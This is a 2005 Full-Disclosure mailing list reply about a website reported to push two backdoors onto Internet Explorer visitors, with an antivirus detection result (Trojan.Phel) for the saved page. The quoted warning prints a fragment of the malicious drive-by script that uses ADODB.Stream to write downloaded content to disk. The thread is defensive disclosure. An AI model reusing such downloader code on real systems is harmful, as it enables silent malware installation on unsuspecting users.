[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] http://molecularmultimedia.com/ an exploit distribution point
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>, <aditya.deshmukh@xxxxxxxxxxxxxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] http://molecularmultimedia.com/ an exploit distribution point
- From: "Bart Lansing" <bart.lansing@xxxxxxxxxxxx>
- Date: Tue, 4 Oct 2005 06:12:01 -0700
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Aditya,
Symantec AV defines that txt as:
Scan type: Auto-Protect Scan
Event: Threat Found!
Threat: Trojan.Phel
File: E:\TEMP\notes53B1E5\molecularmultimedia.com.txt
Webamster and others @molecularmultimedia.com being cc'd on this
mail
On Mon, 03 Oct 2005 20:41:12 -0700 Aditya Deshmukh
<aditya.deshmukh@xxxxxxxxxxxxxxxxxxxxxxxxxxxx> wrote:
>ALERT do not visit with internet explorer
>http://molecularmultimedia.com/
>
>It attemps to download 2 backdoors - anyone want to inform them ?
>
>The homepage is a script
>
>('ADODB.Stream');o.Mode=3;o.Type=1;o.Open();o.Write(b.responseBody)
>;o.SaveTo
>File(d,2)
>
>Full script in the attachment...
>
>
>___________________________________________________________________
>_____
>Delivered using the Free Personal Edition of Mailtraq
>(www.mailtraq.com)
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4
wkYEARECAAYFAkNCf7EACgkQfw4CJpLBxOO3UwCgqyLcFdm6nxcFuOayJylt/6YaP8MA
niwSmSIHGjIfYm4GyuMYJ8X1Wr/W
=J3s+
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434
Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/